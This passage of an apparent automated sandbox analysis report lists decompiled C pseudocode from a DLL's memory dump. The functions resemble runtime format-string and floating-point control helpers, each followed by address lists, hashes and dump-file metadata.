										if((_t58 & 0x00000001) == 0) {
											L49:
											_t90 = 0;
											__eflags = 0;
											L50:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L53:
												_t59 = 1;
												L54:
												__eflags = _t90;
												if(_t90 != 0) {
													L56:
													 *((char*)(_t119 + _t95 - 4)) = 0x30;
													__eflags = _t110 - 0x58;
													if(_t110 == 0x58) {
														L59:
														0x78 = 0x58;
														L60:
														 *((char*)(_t119 + _t95 - 3)) = 0x78;
														_t95 = _t95 + 2;
														__eflags = _t95;
														_v12 = _t95;
														L61:
														_t91 = _t117 + 0x18;
														_t61 = _t117 + 0x448;
														_t114 =  *((intOrPtr*)(_t117 + 0x24)) -  *((intOrPtr*)(_t117 + 0x38)) - _t95;
														__eflags =  *(_t117 + 0x20) & 0x0000000c;
														if(( *(_t117 + 0x20) & 0x0000000c) == 0) {
															E6E1A6EC8(_t61, 0x20, _t114, _t91);
															_t95 = _v12;
															_t120 = _t120 + 0x10;
														}
														_push(_t117 + 0xc);
														E6E1ACFAE(_t117 + 0x448,  &_v8, _t95, _t91);
														_t97 =  *(_t117 + 0x20);
														_t66 = _t97 >> 3;
														__eflags = _t66 & 0x00000001;
														if((_t66 & 0x00000001) != 0) {
															_t99 = _t97 >> 2;
															__eflags = _t99 & 0x00000001;
															if((_t99 & 0x00000001) == 0) {
																E6E1A6EC8(_t117 + 0x448, 0x30, _t114, _t91);
																_t120 = _t120 + 0x10;
															}
														}
														E6E1ACD89(_t91, _t117, _t114, _t117, 0);
														__eflags =  *_t91;
														if( *_t91 >= 0) {
															_t69 =  *(_t117 + 0x20) >> 2;
															__eflags = _t69 & 0x00000001;
															if((_t69 & 0x00000001) != 0) {
																E6E1A6EC8(_t117 + 0x448, 0x20, _t114, _t91);
															}
														}
														goto L70;
													}
													__eflags = _t110 - 0x41;
													if(_t110 == 0x41) {
														goto L59;
													}
													goto L60;
												}
												__eflags = _t59;
												if(_t59 == 0) {
													goto L61;
												}
												goto L56;
											}
											__eflags = _t110 - 0x41;
											if(_t110 == 0x41) {
												goto L53;
											}
											_t59 = 0;
											goto L54;
										}
										_t90 = 1;
										goto L50;
									}
									__eflags = _t110 - 0x58;
									if(_t110 != 0x58) {
										goto L49;
									}
									goto L47;
								}
								_t76 = _t89 >> 6;
								__eflags = 1 & _t76;
								if((1 & _t76) == 0) {
									__eflags = 1 & _t89;
									if((1 & _t89) == 0) {
										_t78 = _t89 >> 1;
										__eflags = 1 & _t78;
										if((1 & _t78) != 0) {
											_v8 = 0x20;
											_t95 = 1;
											_v12 = 1;
										}
										goto L45;
									}
									_v8 = 0x2b;
									L42:
									_t95 = 1;
									_v12 = 1;
									goto L45;
								}
								_v8 = 0x2d;
								goto L42;
							}
							L11:
							_t54 = 0;
							goto L71;
						}
						_t80 = _t52;
						__eflags = _t80;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E6E1AB948(_t117, _t107, __eflags);
							goto L10;
						}
						__eflags = _t80 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E6E1AC112(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E6E1AB09F(0, _t117);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t117 + 0x20;
						 *_t2 =  *(_t117 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E6E1ABEF4(__ecx, _t107);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E6E1AC096(__ecx);
					goto L10;
				}
				if(_t122 == 0) {
					goto L27;
				}
				_t123 = _t51 - _t93;
				if(_t123 > 0) {
					_t82 = _t51 - 0x5a;
					__eflags = _t82;
					if(_t82 == 0) {
						_t53 = E6E1AAE3B(__ecx);
						goto L10;
					}
					_t83 = _t82 - 7;
					__eflags = _t83;
					if(_t83 == 0) {
						goto L30;
					}
					__eflags = _t83;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E6E1AB67F(0, _t117, __eflags, 0);
					goto L10;
				}
				if(_t123 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6e1a9ea9
0x6e1a9eaa
0x6e1a9ead
0x6e1a9eb3
0x6e1a9eb4
0x6e1a9eb8
0x6e1a9ebb
0x6e1a9f29
0x6e1a9f2c
0x6e1a9f7b
0x6e1a9f7b
0x6e1a9f7e
0x6e1a9eea
0x6e1a9eec
0x6e1a9ef1
0x6e1a9ef3
0x6e1a9f99
0x6e1a9f9c
0x6e1aa0d0
0x6e1aa0d0
0x6e1aa0d2
0x6e1aa0d5
0x6e1aa0d5
0x6e1a9fa2
0x6e1a9fa4
0x6e1a9fa8
0x6e1a9fad
0x6e1a9fb3
0x6e1a9fb6
0x6e1a9fb9
0x6e1a9fbb
0x6e1a9fec
0x6e1a9fec
0x6e1a9fef
0x6e1a9ff2
0x6e1a9ff9
0x6e1a9ffb
0x6e1a9ffe
0x6e1aa000
0x6e1aa006
0x6e1aa006
0x6e1aa006
0x6e1aa008
0x6e1aa008
0x6e1aa00b
0x6e1aa016
0x6e1aa016
0x6e1aa018
0x6e1aa018
0x6e1aa01a
0x6e1aa020
0x6e1aa020
0x6e1aa025
0x6e1aa028
0x6e1aa033
0x6e1aa035
0x6e1aa036
0x6e1aa036
0x6e1aa03a
0x6e1aa03a
0x6e1aa03d
0x6e1aa040
0x6e1aa044
0x6e1aa04a
0x6e1aa050
0x6e1aa052
0x6e1aa056
0x6e1aa05d
0x6e1aa062
0x6e1aa065
0x6e1aa065
0x6e1aa06b
0x6e1aa078
0x6e1aa07d
0x6e1aa082
0x6e1aa085
0x6e1aa087
0x6e1aa089
0x6e1aa08c
0x6e1aa08f
0x6e1aa09c
0x6e1aa0a1
0x6e1aa0a1
0x6e1aa08f
0x6e1aa0a8
0x6e1aa0ad
0x6e1aa0b0
0x6e1aa0b5
0x6e1aa0b8
0x6e1aa0ba
0x6e1aa0c7
0x6e1aa0cc
0x6e1aa0ba
0x00000000
0x6e1aa0cf
0x6e1aa02a
0x6e1aa02d
0x00000000
0x00000000
0x00000000
0x6e1aa02f
0x6e1aa01c
0x6e1aa01e
0x00000000
0x00000000
0x00000000
0x6e1aa01e
0x6e1aa00d
0x6e1aa010
0x00000000
0x00000000
0x6e1aa012
0x00000000
0x6e1aa012
0x6e1aa002
0x00000000
0x6e1aa002
0x6e1a9ff4
0x6e1a9ff7
0x00000000
0x00000000
0x00000000
0x6e1a9ff7
0x6e1a9fbf
0x6e1a9fc2
0x6e1a9fc4
0x6e1a9fcc
0x6e1a9fce
0x6e1a9fdd
0x6e1a9fdf
0x6e1a9fe1
0x6e1a9fe3
0x6e1a9fe7
0x6e1a9fe9
0x6e1a9fe9
0x00000000
0x6e1a9fe1
0x6e1a9fd0
0x6e1a9fd4
0x6e1a9fd4
0x6e1a9fd6
0x00000000
0x6e1a9fd6
0x6e1a9fc6
0x00000000
0x6e1a9fc6
0x6e1a9ef9
0x6e1a9ef9
0x00000000
0x6e1a9ef9
0x6e1a9f85
0x6e1a9f85
0x6e1a9f88
0x6e1a9f5a
0x6e1a9f5a
0x6e1a9f5b
0x6e1a9f5d
0x6e1a9f5f
0x00000000
0x6e1a9f5f
0x6e1a9f8a
0x6e1a9f8d
0x00000000
0x00000000
0x6e1a9f93
0x6e1a9f02
0x6e1a9f02
0x00000000
0x6e1a9f02
0x6e1a9f2e
0x6e1a9f71
0x00000000
0x6e1a9f71
0x6e1a9f30
0x6e1a9f33
0x6e1a9f66
0x6e1a9f68
0x00000000
0x6e1a9f68
0x6e1a9f35
0x6e1a9f38
0x6e1a9f56
0x6e1a9f56
0x6e1a9f56
0x6e1a9f56
0x00000000
0x6e1a9f56
0x6e1a9f3a
0x6e1a9f3d
0x6e1a9f4f
0x00000000
0x6e1a9f4f
0x6e1a9f3f
0x6e1a9f42
0x00000000
0x00000000
0x6e1a9f46
0x00000000
0x6e1a9f46
0x6e1a9ebd
0x00000000
0x00000000
0x6e1a9ec3
0x6e1a9ec5
0x6e1a9f06
0x6e1a9f06
0x6e1a9f09
0x6e1a9f22
0x00000000
0x6e1a9f22
0x6e1a9f0b
0x6e1a9f0b
0x6e1a9f0e
0x00000000
0x00000000
0x6e1a9f11
0x6e1a9f14
0x00000000
0x00000000
0x6e1a9f16
0x6e1a9f19
0x00000000
0x6e1a9f19
0x6e1a9ec7
0x6e1a9f00
0x00000000
0x6e1a9f00
0x6e1a9ecc
0x00000000
0x00000000
0x6e1a9ed5
0x00000000
0x00000000
0x6e1a9eda
0x00000000
0x00000000
0x6e1a9edf
0x00000000
0x00000000
0x6e1a9ee8
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6E1AA020

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8efa59857085ea1b3e727f40273ffea79edee8d7e96ce9281366df59e6e11384
Instruction ID: 31d396e7b435dfdea6cfc4a57229d2d4c41cafd90d5ff15070788015b608805a
Opcode Fuzzy Hash: 8efa59857085ea1b3e727f40273ffea79edee8d7e96ce9281366df59e6e11384
Instruction Fuzzy Hash: 9251887C2407895ADB9489EDE9F07FEBB9D9B22304F20481AD742D7281C713DDC8B252

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9A31, Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E1A9A31(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t51;
				signed int _t52;
				void* _t53;
				signed int _t54;
				signed char _t56;
				signed char _t58;
				signed int _t59;
				void* _t61;
				signed char _t66;
				signed char _t69;
				signed char _t76;
				signed char _t78;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				unsigned int _t89;
				signed int _t90;
				signed int* _t91;
				void* _t93;
				signed int _t95;
				unsigned int _t97;
				signed char _t99;
				void* _t107;
				intOrPtr _t110;
				void* _t114;
				intOrPtr* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_push(__ecx);
				_push(__ecx);
				_t117 = __ecx;
				_t93 = 0x58;
				_t51 =  *((char*)(__ecx + 0x31));
				_t122 = _t51 - 0x64;
				if(_t122 > 0) {
					__eflags = _t51 - 0x70;
					if(__eflags > 0) {
						_t52 = _t51 - 0x73;
						__eflags = _t52;
						if(_t52 == 0) {
							L9:
							_t53 = E6E1AC172(_t117);
							L10:
							if(_t53 != 0) {
								__eflags =  *(_t117 + 0x30);
								if( *(_t117 + 0x30) != 0) {
									L70:
									_t54 = 1;
									L71:
									return _t54;
								}
								_t95 = 0;
								_v8 = 0;
								_v6 = 0;
								_t89 =  *(_t117 + 0x20);
								_v12 = 0;
								_t56 = _t89 >> 4;
								__eflags = 1 & _t56;
								if((1 & _t56) == 0) {
									L45:
									_t110 =  *((intOrPtr*)(_t117 + 0x31));
									__eflags = _t110 - 0x78;
									if(_t110 == 0x78) {
										L47:
										_t58 = _t89 >> 5;
										__eflags = _t58 & 0x00000001;
										if((_t58 & 0x00000001) == 0) {
											L49:
											_t90 = 0;
											__eflags = 0;
											L50:
											__eflags = _t110 - 0x61;
											if(_t110 == 0x61) {
												L53:
												_t59 = 1;
												L54:
												__eflags = _t90;
												if(_t90 != 0) {
													L56:
													 *((char*)(_t119 + _t95 - 4)) = 0x30;
													__eflags = _t110 - 0x58;
													if(_t110 == 0x58) {
														L59:
														0x78 = 0x58;
														L60:
														 *((char*)(_t119 + _t95 - 3)) = 0x78;
														_t95 = _t95 + 2;
														__eflags = _t95;
														_v12 = _t95;
														L61:
														_t91 = _t117 + 0x18;
														_t61 = _t117 + 0x448;
														_t114 =  *((intOrPtr*)(_t117 + 0x24)) -  *((intOrPtr*)(_t117 + 0x38)) - _t95;
														__eflags =  *(_t117 + 0x20) & 0x0000000c;
														if(( *(_t117 + 0x20) & 0x0000000c) == 0) {
															E6E1A6E4D(_t61, 0x20, _t114, _t91);
															_t95 = _v12;
															_t120 = _t120 + 0x10;
														}
														_push(_t117 + 0xc);
														E6E1ACF56(_t117 + 0x448,  &_v8, _t95, _t91);
														_t97 =  *(_t117 + 0x20);
														_t66 = _t97 >> 3;
														__eflags = _t66 & 0x00000001;
														if((_t66 & 0x00000001) != 0) {
															_t99 = _t97 >> 2;
															__eflags = _t99 & 0x00000001;
															if((_t99 & 0x00000001) == 0) {
																E6E1A6E4D(_t117 + 0x448, 0x30, _t114, _t91);
																_t120 = _t120 + 0x10;
															}
														}
														E6E1ACCE2(_t91, _t117, _t114, _t117, 0);
														__eflags =  *_t91;
														if( *_t91 >= 0) {
															_t69 =  *(_t117 + 0x20) >> 2;
															__eflags = _t69 & 0x00000001;
															if((_t69 & 0x00000001) != 0) {
																E6E1A6E4D(_t117 + 0x448, 0x20, _t114, _t91);
															}
														}
														goto L70;
													}
													__eflags = _t110 - 0x41;
													if(_t110 == 0x41) {
														goto L59;
													}
													goto L60;
												}
												__eflags = _t59;
												if(_t59 == 0) {
													goto L61;
												}
												goto L56;
											}
											__eflags = _t110 - 0x41;
											if(_t110 == 0x41) {
												goto L53;
											}
											_t59 = 0;
											goto L54;
										}
										_t90 = 1;
										goto L50;
									}
									__eflags = _t110 - 0x58;
									if(_t110 != 0x58) {
										goto L49;
									}
									goto L47;
								}
								_t76 = _t89 >> 6;
								__eflags = 1 & _t76;
								if((1 & _t76) == 0) {
									__eflags = 1 & _t89;
									if((1 & _t89) == 0) {
										_t78 = _t89 >> 1;
										__eflags = 1 & _t78;
										if((1 & _t78) != 0) {
											_v8 = 0x20;
											_t95 = 1;
											_v12 = 1;
										}
										goto L45;
									}
									_v8 = 0x2b;
									L42:
									_t95 = 1;
									_v12 = 1;
									goto L45;
								}
								_v8 = 0x2d;
								goto L42;
							}
							L11:
							_t54 = 0;
							goto L71;
						}
						_t80 = _t52;
						__eflags = _t80;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E6E1AB948(_t117, _t107, __eflags);
							goto L10;
						}
						__eflags = _t80 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E6E1AC112(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E6E1AB09F(0, _t117);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t117 + 0x20;
						 *_t2 =  *(_t117 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E6E1ABEF4(__ecx, _t107);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E6E1AC096(__ecx);
					goto L10;
				}
				if(_t122 == 0) {
					goto L27;
				}
				_t123 = _t51 - _t93;
				if(_t123 > 0) {
					_t82 = _t51 - 0x5a;
					__eflags = _t82;
					if(_t82 == 0) {
						_t53 = E6E1AAE3B(__ecx);
						goto L10;
					}
					_t83 = _t82 - 7;
					__eflags = _t83;
					if(_t83 == 0) {
						goto L30;
					}
					__eflags = _t83;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E6E1AB67F(0, _t117, __eflags, 0);
					goto L10;
				}
				if(_t123 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x6e1a9a36
0x6e1a9a37
0x6e1a9a3a
0x6e1a9a40
0x6e1a9a41
0x6e1a9a45
0x6e1a9a48
0x6e1a9ab6
0x6e1a9ab9
0x6e1a9b08
0x6e1a9b08
0x6e1a9b0b
0x6e1a9a77
0x6e1a9a79
0x6e1a9a7e
0x6e1a9a80
0x6e1a9b26
0x6e1a9b29
0x6e1a9c5d
0x6e1a9c5d
0x6e1a9c5f
0x6e1a9c62
0x6e1a9c62
0x6e1a9b2f
0x6e1a9b31
0x6e1a9b35
0x6e1a9b3a
0x6e1a9b40
0x6e1a9b43
0x6e1a9b46
0x6e1a9b48
0x6e1a9b79
0x6e1a9b79
0x6e1a9b7c
0x6e1a9b7f
0x6e1a9b86
0x6e1a9b88
0x6e1a9b8b
0x6e1a9b8d
0x6e1a9b93
0x6e1a9b93
0x6e1a9b93
0x6e1a9b95
0x6e1a9b95
0x6e1a9b98
0x6e1a9ba3
0x6e1a9ba3
0x6e1a9ba5
0x6e1a9ba5
0x6e1a9ba7
0x6e1a9bad
0x6e1a9bad
0x6e1a9bb2
0x6e1a9bb5
0x6e1a9bc0
0x6e1a9bc2
0x6e1a9bc3
0x6e1a9bc3
0x6e1a9bc7
0x6e1a9bc7
0x6e1a9bca
0x6e1a9bcd
0x6e1a9bd1
0x6e1a9bd7
0x6e1a9bdd
0x6e1a9bdf
0x6e1a9be3
0x6e1a9bea
0x6e1a9bef
0x6e1a9bf2
0x6e1a9bf2
0x6e1a9bf8
0x6e1a9c05
0x6e1a9c0a
0x6e1a9c0f
0x6e1a9c12
0x6e1a9c14
0x6e1a9c16
0x6e1a9c19
0x6e1a9c1c
0x6e1a9c29
0x6e1a9c2e
0x6e1a9c2e
0x6e1a9c1c
0x6e1a9c35
0x6e1a9c3a
0x6e1a9c3d
0x6e1a9c42
0x6e1a9c45
0x6e1a9c47
0x6e1a9c54
0x6e1a9c59
0x6e1a9c47
0x00000000
0x6e1a9c5c
0x6e1a9bb7
0x6e1a9bba
0x00000000
0x00000000
0x00000000
0x6e1a9bbc
0x6e1a9ba9
0x6e1a9bab
0x00000000
0x00000000
0x00000000
0x6e1a9bab
0x6e1a9b9a
0x6e1a9b9d
0x00000000
0x00000000
0x6e1a9b9f
0x00000000
0x6e1a9b9f
0x6e1a9b8f
0x00000000
0x6e1a9b8f
0x6e1a9b81
0x6e1a9b84
0x00000000
0x00000000
0x00000000
0x6e1a9b84
0x6e1a9b4c
0x6e1a9b4f
0x6e1a9b51
0x6e1a9b59
0x6e1a9b5b
0x6e1a9b6a
0x6e1a9b6c
0x6e1a9b6e
0x6e1a9b70
0x6e1a9b74
0x6e1a9b76
0x6e1a9b76
0x00000000
0x6e1a9b6e
0x6e1a9b5d
0x6e1a9b61
0x6e1a9b61
0x6e1a9b63
0x00000000
0x6e1a9b63
0x6e1a9b53
0x00000000
0x6e1a9b53
0x6e1a9a86
0x6e1a9a86
0x00000000
0x6e1a9a86
0x6e1a9b12
0x6e1a9b12
0x6e1a9b15
0x6e1a9ae7
0x6e1a9ae7
0x6e1a9ae8
0x6e1a9aea
0x6e1a9aec
0x00000000
0x6e1a9aec
0x6e1a9b17
0x6e1a9b1a
0x00000000
0x00000000
0x6e1a9b20
0x6e1a9a8f
0x6e1a9a8f
0x00000000
0x6e1a9a8f
0x6e1a9abb
0x6e1a9afe
0x00000000
0x6e1a9afe
0x6e1a9abd
0x6e1a9ac0
0x6e1a9af3
0x6e1a9af5
0x00000000
0x6e1a9af5
0x6e1a9ac2
0x6e1a9ac5
0x6e1a9ae3
0x6e1a9ae3
0x6e1a9ae3
0x6e1a9ae3
0x00000000
0x6e1a9ae3
0x6e1a9ac7
0x6e1a9aca
0x6e1a9adc
0x00000000
0x6e1a9adc
0x6e1a9acc
0x6e1a9acf
0x00000000
0x00000000
0x6e1a9ad3
0x00000000
0x6e1a9ad3
0x6e1a9a4a
0x00000000
0x00000000
0x6e1a9a50
0x6e1a9a52
0x6e1a9a93
0x6e1a9a93
0x6e1a9a96
0x6e1a9aaf
0x00000000
0x6e1a9aaf
0x6e1a9a98
0x6e1a9a98
0x6e1a9a9b
0x00000000
0x00000000
0x6e1a9a9e
0x6e1a9aa1
0x00000000
0x00000000
0x6e1a9aa3
0x6e1a9aa6
0x00000000
0x6e1a9aa6
0x6e1a9a54
0x6e1a9a8d
0x00000000
0x6e1a9a8d
0x6e1a9a59
0x00000000
0x00000000
0x6e1a9a62
0x00000000
0x00000000
0x6e1a9a67
0x00000000
0x00000000
0x6e1a9a6c
0x00000000
0x00000000
0x6e1a9a75
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 6E1A9BAD

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e75e5c1fce907b2e452b0c3e5b4cc1d0dc3b29f5e3b95001804279a95731a785
Instruction ID: b9a0e4b8416ba6ed92211764a2cd95be25a7d7d575353cc5f63e33318d71c7a6
Opcode Fuzzy Hash: e75e5c1fce907b2e452b0c3e5b4cc1d0dc3b29f5e3b95001804279a95731a785
Instruction Fuzzy Hash: 8F519A7C24464A9EDB94CDEDA8B1BFE779DAB62304F20081BC756CB290CB1799C5B341

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C7291, Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E6E1C7291(unsigned int _a4) {
				signed int _v8;
				signed int _v32;
				void _v36;
				signed int _t56;
				signed int _t59;
				unsigned int _t61;
				unsigned int _t63;
				signed int _t70;
				signed int _t81;
				void* _t101;

				_t61 = _a4;
				_t68 = _t61 >> 0x00000010 & 0x0000003f;
				_t70 = 7;
				memset( &_v36, 0, _t70 << 2);
				asm("fnstenv [ebp-0x20]");
				_v32 = _v32 ^ (_v32 ^ ((_t61 >> 0x00000010 & 1) << 0x00000005 | ((_t61 >> 0x00000010 & 0x0000003f) >> 0x00000001 & 1) << 0x00000004 | (_t68 >> 0x00000002 & 1) << 0x00000003 | (_t68 >> 0x00000003 & 1) << 0x00000002 | _t68 >> 0x00000004 & 1 | (_t68 >> 0x00000005 & 1) + (_t68 >> 0x00000005 & 1))) & 0x0000003f;
				asm("fldenv [ebp-0x20]");
				_t63 = _t61 >> 0x00000018 & 0x0000003f;
				_t56 = (_t63 >> 0x00000005 & 1) + (_t63 >> 0x00000005 & 1);
				_t81 = (_t63 & 1) << 0x00000005 | (_t63 >> 0x00000001 & 1) << 0x00000004 | (_t63 >> 0x00000002 & 1) << 0x00000003 | (_t63 >> 0x00000003 & 1) << 0x00000002 | _t63 >> 0x00000004 & 1 | _t56;
				_t101 =  *0x6e212fd8 - 1; // 0x6
				if(_t101 >= 0) {
					asm("stmxcsr dword [ebp-0x4]");
					_t59 = _v8 & 0xffffffc0 | _t81 & 0x0000003f;
					_v8 = _t59;
					asm("ldmxcsr dword [ebp-0x4]");
					return _t59;
				}
				return _t56;
			}

0x6e1c729c
0x6e1c72a4
0x6e1c72fc
0x6e1c72fd
0x6e1c72ff
0x6e1c730e
0x6e1c7311
0x6e1c7317
0x6e1c7361
0x6e1c7364
0x6e1c7366
0x6e1c736e
0x6e1c7370
0x6e1c737d
0x6e1c737f
0x6e1c7382
0x00000000
0x6e1c7382
0x6e1c7387

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876d9600732ba9801d7334c8e3be23515d5f0ae6db2212158aee0ce66d5664ff
Instruction ID: 93aa6bde2ba5fee968cb311c1384885443011d35d55dd7e8fe47839d46743841
Opcode Fuzzy Hash: 876d9600732ba9801d7334c8e3be23515d5f0ae6db2212158aee0ce66d5664ff
Instruction Fuzzy Hash: 9721B373F208394B7B0CC47E8C572BDB6E1C68C501745823AF8A6EA2C1D96CD917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C7171, Relevance: .1, Instructions: 81
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E6E1C7171(void* __ecx) {
				signed int _v8;
				signed int _v12;
				unsigned int _t55;
				signed int _t70;
				void* _t72;

				_v8 = 0;
				asm("fnstsw word [ebp-0x4]");
				_t70 = ((_v8 & 0x3f) >> 0x00000001 & 1) << 0x00000005 | ((_v8 & 0x3f) >> 0x00000002 & 1) << 0x00000003 | ((_v8 & 0x3f) >> 0x00000003 & 1) << 0x00000002 | (_t43 >> 0x00000004 & 1) + (_t43 >> 0x00000004 & 1) | (_t43 & 1) << 0x00000004 | _t43 >> 0x00000005;
				_t72 =  *0x6e212fd8 - 1; // 0x6
				if(_t72 >= 0) {
					asm("stmxcsr dword [ebp-0x8]");
					_t55 = _v12 & 0x0000003f;
				} else {
					_t55 = 0;
				}
				return (((_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005) << 0x00000008 | _t70) << 0x00000010 | (_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005 | _t70;
			}

0x6e1c717c
0x6e1c7180
0x6e1c71c5
0x6e1c71c7
0x6e1c71cd
0x6e1c71d3
0x6e1c71da
0x6e1c71cf
0x6e1c71cf
0x6e1c71cf
0x6e1c7228

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67ecddd26d2aa78bb2d09bcbc734f240f7ba080488bc940b2874d00c086d25b2
Instruction ID: 119d2a4a20e67ea926b82d7d6d7a18805fd5e82734b86dc22380e355431aa50f
Opcode Fuzzy Hash: 67ecddd26d2aa78bb2d09bcbc734f240f7ba080488bc940b2874d00c086d25b2
Instruction Fuzzy Hash: D911A723F30C255A675C81BD8C172AA95D2DBD824070F433AD826E72C4E894DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B726E, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B726E(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6E1B181D(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x6e1b727b
0x6e1b727d
0x6e1b7280
0x6e1b7283
0x6e1b7286
0x6e1b7297
0x6e1b7299
0x6e1b7288
0x6e1b728c
0x6e1b7295
0x00000000
0x00000000
0x6e1b7295
0x6e1b729e

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28cd18f0f40977d55b3ccf3842cfc62c2af963a1a2ec33bc88d914a27cd574a3
Instruction ID: cf7f292a6ac4dc24c9659236cfb7fa7ad2f369d659930d60c0d4f396ae295e5e
Opcode Fuzzy Hash: 28cd18f0f40977d55b3ccf3842cfc62c2af963a1a2ec33bc88d914a27cd574a3
